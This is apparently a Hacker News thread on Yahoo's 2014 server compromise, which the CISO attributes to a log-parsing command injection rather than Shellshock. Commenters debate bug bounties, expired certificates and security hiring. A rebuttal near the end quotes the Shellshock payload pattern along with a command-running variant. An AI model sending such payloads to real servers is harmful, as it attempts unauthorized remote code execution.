Hacker News new | comments | show | ask | jobs | submit login

Howdy, Hacker News. I’m the CISO of Yahoo and I wanted to clear up some misconceptions.

Earlier today, we reported that we isolated a handful of servers that were detected to have been impacted by a security flaw. After investigating the situation fully, it turns out that the servers were in fact not affected by Shellshock.

Three of our Sports API servers had malicious code executed on them this weekend by attackers looking for vulnerable Shellshock servers. These attackers had mutated their exploit, likely with the goal of bypassing IDS/IDP or WAF filters. This mutation happened to exactly fit a command injection bug in a monitoring script our Sports team was using at that moment to parse and debug their web logs.

Regardless of the cause our course of action remained the same: to isolate the servers at risk and protect our users' data. The affected API servers are used to provide live game streaming data to our Sports front-end and do not store user data. At this time we have found no evidence that the attackers compromised any other machines or that any user data was affected. This flaw was specific to a small number of machines and has been fixed, and we have added this pattern to our CI/CD code scanners to catch future issues.

As you can imagine this episode caused some confusion in our team, since the servers in question had been successfully patched (twice!!) immediately after the Bash issue became public. Once we ensured that the impacted servers were isolated from the network, we conducted a comprehensive trace of the attack code through our entire stack which revealed the root cause: not Shellshock. Let this be a lesson to defenders and attackers alike: just because exploit code works doesn’t mean it triggered the bug you expected!

I also want to address another issue: Yahoo takes external security reports seriously and we strive to respond immediately to credible tips. We monitor our Bug Bounty (bugbounty.yahoo.com) and security aliases (security@yahoo.com) 24x7, and our records show no attempt by this researcher to contact us using those means. Within an hour of our CEO being emailed directly we had isolated these systems and begun our investigation. We run one of the most successful Bug Bounty programs in the world and I hope everybody here will participate and help us keep our users safe.

We’re always looking for people who want to keep nearly a billion users safe at scale. paranoids-hiring@yahoo-inc.com




>> Yahoo takes external security reports seriously

Few weeks ago, I reported to your team that some of the yahoo servers' SSL cert were expired, acknowledged but no one want to fix it (until I post it here and finally get them updated...your site was showing security warning to your users for 2 weeks)

One of your awesome engineers replied the issue with expired SSL cert: "there do not appear to be any security implications as a direct result of this behavior"


I appreciate you reporting expired certs, which unfortunately happen from time to time. That canned reply for is not appropriate and not a reflection of how we approach TLS and I will get it changed.


which unfortunately happen from time to time

How on earth do you manage that? Surely you have a process for monitoring and maintaining them?


Any real third party certification authority will let you generate emails to an address of your choice 90, 30, 14, and 3 days before your cert expires (or some similar schedule)

Why wouldn't Yahoo set this up to email the group responsible or a ticketing email?


Or you know, create a reminder in Yahoo! Calendar...


People use that??


Does your "successful" bug bounty program still only pays $12,50 in store credit per bug? That could explain the lack of interest in contacting you about any bug at all.


I was curious. So I went to the link secalex posted. Bountys start at $50; max is $15k.


Admob.com also had an expired ssl cert for a few days recently.


People make mistake, we all understand. (actually quite surprising as Yahoo does not have a mechanism to scan/monitor expired SSL certs).

This is not the real issue here, the thing is their engineers think expired SSL cert is okay and no action being done. I told them you are now training your users to `feel` comfortable with browser warnings when they edit their Yahoo profile and risk your users in future's phishing attacks. I asked them why you are not using a self-signed cert if you think expired SSL cert is okay (of coz they didn't reply)

Util I raise this up in another hackernews' thread on their product's announcement and maybe this time it really made them feel embarrassing and finally they fixed it with a day.

The real problem here is actually not on the expired SSL cert, it is their mindset - you should treat every little reports seriously and it is your responsibility, because you are running one of the world's largest web sites.


if that's true then... wow and hopefully there's a new engineering position opening up at Yahoo right now


Patched twice? There are 7 known shellshock exploits (and 30 patches) so far.. https://shellshocker.net/

Not knocking on you or anything, just more interested to know if all exploits have been patched against, more than the # of patches applied.


Before Yahoo poached him to be their CISO, Alex was one of the principals behind iSEC Partners, our former arch-competitor and now sister company. He knows what he's talking about. If he says they're on top of shellshock, my money would be on him being right.

His team also recently poached Chris Rohlf, from his own company no less!, and Chris is probably one of the best vulnerability researchers working.

(I have no affiliation whatsoever with Yahoo and while I like Alex fine, we're not close friends. I'm pretty biased about Chris, though.)

This is more "vote of confidence" than your comment asked for; I'm just heading off a potentially unproductive thread at the pass. :)


This all sounds good - especially given your reputation for infosec.

However, genuine question - how does the laymen (like myself) rate infosec specialists? Imagine for a second I'm a senior exec at Target and IBN (IBM's fake arch-competitor) comes to me and says "no worries about security, we use 256-bit encryption, bank grade security, etc etc". Do I believe him?

I feel like infosec is a "I don't know what I don't know" industry and the consequences could be potentially dire.


You essentially can't evaluate that in isolation (looking at their past interactions with the infosec community may help).

It gets better: you can't even depend on the large players generally getting it right. If a large organization makes a bad decision with their first infosec hire, it's not a self-correcting problem - the next hires will be cut from the same cloth, and unless something blows up, almost nobody will know.


If I knew, I'd be a lot wealthier. :|


How much are e.g. SANS certifications worth? I subscribe to their vulnerablity emails but they push the certification programs so hard it smells a little like University of Phoenix.


I can't comment on SANS in particular, but certifications in general tend to be worthless. Receiving a certification tends to be more a matter of persistence than competence. Worse, because the higher quality applicants generally recognize the futility in it, many of them don't participate, which means you can't even assume that someone without the certificate is unqualified.

As far as I can tell the best information provided by a certificate is that you should avoid applicants who brag about them (and for applicants, avoid employers who list them as job qualifications).


I'm not a fan of any security certification.


You make hiring decisions off of a home-grown security "course", right? You've found that valuable -- would others?


That's not an accurate summary of how we hire. We don't make decisions based on the crypto challenges or Microcorruption; we use them to find people to talk to. We have a whole process that actively evaluates candidates.


In some organizations, infosec is just for show. They do it because compliance forces them to do so. In those organizations, the senior execs don't care. They only want to keep the cost down and to comply with audits. They hire managers who do that and mostly rely on legal contracts and agreements to enforce security. When they get hacked, they will pull out the report (or whatever) that states that they are XYZ compliant.


While I don't doubt that infosec is just for show in some places, you can't just say that when they get hacked, they'll just say "We're XYZ compliant" and do nothing else.

The whole point of those audits is to show that, while every company of any importance will eventually have some sort of breach/break-in/hack, the company takes all reasonable steps to prevent it and mitigate the possible effects of such an event.

Infosec isn't a fool-proof thing. There's no way to prevent everything, and all you can do is keep on top of things and take steps to ensure you're doing everything you can to protect your systems.

You WILL get hacked eventually.


Twice means once for the initial bug on Wednesday, the second time with one of the "nuke the attack surface from orbit, it's the only way to be sure" patches that became available that Thursday.

This is no guarantee, of course, which is why the pen-test team that Chris Rohlf runs has to stay abreast of and continuously test the latest available exploits as well as the attempts that we see in our logs.


If you followed some common-sense advice [1], you only needed two patches: the original one as a stop-gap measure for the original RCE on September 24, and Florian's prefix-adding patch that came out shortly thereafter (but has taken some time to appear upstream).

Now, I'm a bit stumped how any obvious variant of the CVE-2014-6271 or CVE-2014-6278 RCE payloads could lead to accidental code execution somewhere else, since they generally produce a parser-breaking syntax error when executed outside an env-encoded function definition. Also, because of an unusual fixed-string prefix required to carry out the attack, there is not a lot you can really do to avoid any half-baked IDS/IPS. Anyway, for the sake of my idle curiosity, I secretly hope that Alex shares the buggy line of code, even though that's unlikely =)

[1] http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficia...


There aren't '30 patches' for each system. For CentOS there have been only 2 patches as far as I can tell. Whether all of the issues have been fixed in these patches, I'm not certain. I've also made sure we're using modperl instead of cgi perl.


The 30 patches are the number of total patches on that version of bash (bash's version release cycle is major.minor.patch), not the number of patches related to shellshock.


I've long had experience with: exploits working for the wrong reason, and also the reverse, failing for the wrong reason.

For example, way back in the day before ISS bought my company, somebody claimed their IDS was vulnerable to an IMAP evasion. They actually weren't, but that specific test triggered a wholly separate (and much worse) bug that made it look like it was evadable. I laughed and laughed.


It looks like the guy who originally posted this has pretty much accused you of flat out lying about this[1]. What do you have to say to his comments, particularly about the sports servers being internal.

[1] - http://www.futuresouth.us/wordpress/?p=25


Yes, the systems with the log parsing bug are part of an internal subnet. As with most web scale companies HTTPS requests are terminated on a unified edge and load-balanced to web service hosts in internal clusters. In this case the malicious header was maintained in the backend requests and ended up in the application log, which triggered the command injection. Everything I wrote above is correct and is in no way incompatible with the fact that the affected machines have RFC1918 addresses.


Thanks for that. Understandably, the presence of an RFC1918 address doesn't necessarily mean a site isn't inaccessible, but for everyone else there's no way to tell without poking around Yahoo! which, lets face it, isn't something many of us would condone.


That fact that the API hosts are internal seems to be the bulk of the argument against the validity of the claims here. However, internally accessible application servers behind public proxy/proxies is a fairly common pattern...


If you want hackers to report you vulnerabilities via Yahoo Bug Bounty Program, at least pay more than 50$ for a minimum bounty, 50$ is a joke https://hackerone.com/yahoo ...


That's the minimum bounty. It's what they'll pay for an off-brand CSRF. They'll pay up to $15,000. Wild guess: RCE doesn't get the minimum bounty.


RCE is 3000$ for *.yahoo.com https://hackerone.com/reports/6674. I forgot, they want RCE on https://login.yahoo.com, and then maybe, but maybe, they will pay 15000$

Thank you


That one single instance, in those circumstances, was $3k. Which (a) is much, much more than $50, and (b) is not bad for a bug that dies the instant the vendor learns about it.


I view bug bounties as more of a conscious nod towards responsible disclosure than anything else. I sincerely doubt anyone could make a competitive living off of bug bounty programs (even accounting for the legal grey area of selling vulnerabilities) so the economic incentive argument seems really silly to me.

In contrast, if you've ever tried to responsibly disclose a vulnerability and gotten a threat from the legal department in response (still common practice in a lot of companies), a bug bounty program can be a very encouraging show of good faith.


We have several participants in our program who are making a pretty decent living, especially the ones for whom a US$5000 reward is comparable to their nation's per-capita GDP. We are hoping to highlight some of these people in a future talk.

I personally think that the opening created for those without the educational or economic opportunities available to developed world researchers is the best side effects of bug bounties.


I think there are quite a few people who do make a living by participating in vulnerability reward programs (well, not at $50 level, obviously).

Now, I have not seen too many people who would be doing it consistently for many years - simply because it gets tiresome. But it's the same thing for security consulting - at most consultancies, pentesters come and go.


$50.00 is a joke, I'm sure they can do better.


Me too. I am sure, too. You know how I'm sure? Because I clicked the link the parent commenter helpfully provided alongside their gripe about Yahoo's bug bounty and read that they do, in fact, do better.


Interesting I saw the Y debug tool on sports.yahoo.com . It said Y Confidential and had a web bug on it and something else in red. Also, was on the yahoo.com root domain. I saw this over a few days. Did anyone else see it? I couldn't click on anything and it was on the lower right hand corner of the screen.


My opinionated answer to the statement released by Yahoo!:

I won’t sit here and say that I think they are lying. To make such an accusation would only prove me to be a fool not having ammunition in the weapon before I fire it. I will, however, say that I believe – in my opinion – that this is a wordplay and a game of semantics. First off, there are several “shellshock” exploits. The term “shellshock” as the media has portrayed it is to execute the vulnerability or vulnerabilities recently discovered in bash by means of delivering the following payload: () { :; }; <commands>

When we look at this payload, what we are actually seeing is a function definition, not the execution of or calling of that function, with the regards to the following: () { :; }; 

The actual “arbitrary code” to be executed last past that point, where we’re no longer defining a function, but instead – giving instructions to be executed on the operating system via Bash. One could inevitable argue that taking the payload, and modifying it to look like: () { whatever; }; /bin/bash –c ‘id;uname –a’ could, or even could not, be identified as “shellshock” in the manner of which it was portrayed to be by the media. However, the fact still remains that this “payload” would cause the execution of the commands proceeding the {}; 

When we look at the other SIX (6) payloads that essentially accomplish the same exact thing: https://shellshocker.net – we see that modification of the “payload” does not stop the blatant fact that the same underlying results are achieved via the same exact vulnerable code in the Bash shell. 

My response to Yahoo! : Please issue out the UNTAMPERED and UNMODIFIED apache logs, showing the payload delivered to your “sports API’s” - and other researchers, and potentially shareholders, determine what the underlying cause was. Furthermore, to state that this resulted in bypassing your “IDS/IDP” and “WAF filters” makes me wonder exactly what kind of IDS/IDP and WAF filtering you’re imploring. I’m willing to bet there were exact phrase match filters looking for what most sites have identified as the “Shellshock” vulnerability, I.e. “() { :; };” and preventing the scripts and/or bash from being executed once that string was identified. That could have been with something as simple as a wrapper for bash… And considering the IPS/IDS didn’t pick up on outbound IRC connections on port(s) 6660 and/or 6667, which NO internal server would have a reason to be connecting to, I can only say that your concept of IDS/IDP is seemingly inadequate in my professional opinion. So, once again, since the vulnerability has seemingly been “patched,” I urge you to release the details of the vulnerability in the script, and also explain why it is that the initial compromise appears to have been on a web-facing box with public access to it, and found amongst a botnet running a perl script that had self-spreading and searching capabilities based around the “shellshock” vulnerability? You are comparing apples and oranges, when in all actuality, you should be comparing “to-may-to” to “to-mah-toh."


> Please issue out the UNTAMPERED and UNMODIFIED apache logs

Who do you think you are? lol.


I'm a share holder, making me an "owner" of a publicly traded company. And, who are you?


That's not how it works. You're not privy to the internal operations of Yahoo simply because you own stock. And as regards your role as a security researcher, they're not obligated to disclose logs or, indeed, provide you any detail whatsoever about their security response. They say they've contained the problem, you (presumably) can't still perform the exploit, end of story, unless you have evidence that more servers were compromised than Stamos admits.


Then raise the issue at a shareholder meeting. Owning 2 shares (or 200) won't get you access to logs.


With proper controls, even having 40% of shares won't get you log files having user information. Those roles should be separated.


While we are at it, let me go on a little tangent: I have Yahoo mail for android which i use as a dump of my emails, and I get perhaps 100 emails per day. After about 4-6 weeks, Yahoo mail app becomes so slow, that it is no longer possible to even scroll through emails (on Nexus 5). I have to clear Yahoo app's data cache, and reconfigure to make it fast again. Perhaps it's time to take a look at this: when you have things decaying and breaking like that, it encourages hackers to look extra hard for vulnerabilities, since it's a reasonable assumption that other things are neglected, too. I should note that Yahoo's android mail app is probably the most viable part of the whole Yahoo business now.




Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: